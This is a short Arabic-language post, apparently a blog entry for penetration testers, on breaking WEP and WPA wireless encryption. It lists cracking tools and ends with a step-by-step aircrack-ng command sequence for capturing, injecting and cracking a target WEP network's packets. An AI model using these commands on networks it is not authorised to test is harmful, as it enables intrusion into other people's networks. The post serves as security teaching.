Wireless Hacking
كما نعلم انه يوجد العديد من البروتوكولات المستعلة في حماية شبكات الوايرلس منها ما هو ضعيف و منها ما يصعب اختراقه ، ونحن ك Penetration Testers لا يهمنا الا تقييم مدى امان الشبكة! وهل هناك من وسيلة لاختراقها ...
نبدا باول شئ و هو , ماهي انواع الحماية المتوفرة?
حيث نجد نوعين من بروتوكولات التشفير
wep (wired equivalent privacy) - 1
هذا النوع يضم عدة انواع اخرى تختلف فيما بينها بطول تشفير المفتاح المستخدم فهناك 64 بت و 128 بت، بالتاكيد 128 اقوى من 64 لاكن هذا النوع يضل ضعيف جدا حيث يسهل كسره!
2- (WPA (Wi-Fi Protected Access
نوع ممتاز ! مقارنة مع wep لكنه يضل لايوفر الحماية المطلوبة لذا ثم اختراع نوع جديد يعتمد على سرفرRADIUS في الثوتيق اسمه WPA-RAduis
طريقة الاختراق
WEP
لاختراق شبكة وايرلس تعتمد على WEP في التشفير، سوف تحتاج لجمع بعض آلاف الحزم (لا تخف لن تحتاج اكتر من 5 دقائق)
wep ~ 50000 packet
WEP 128 ~ 700000 packets
WPA
اما هذا النوع فلا ينفع معه الا BruteForce
الادوات المستعملة
netstumble : لكشف اسماء معرف الشبكة SSID حتى المخفية منها
لكسر مفاتيح التشفير cain
لكسر مفاتيح التشفيرaircrack
كذالك يمكنك استعمال برامج اخرى مثل :
Airsnort, kismet, coWPAtty ...
مثال على اختراق شبكة وايرلس WEP:
#airmon-ng start [interface] //make card in monitor mode
#airodump-ng [interface] //show available wireless network
#airodump-ng -c [channel] --bssid [target BSSID] -w [out-file] [interface] //assembly of packets
#aireplay-ng -2 -b [target BSSID] -h [source MAC address] -t 1 [interface] //speed up the assembly of packets by packet injection
#aircrack-ng [output-file] //cracking this output file
RSS خاصية التعليقات
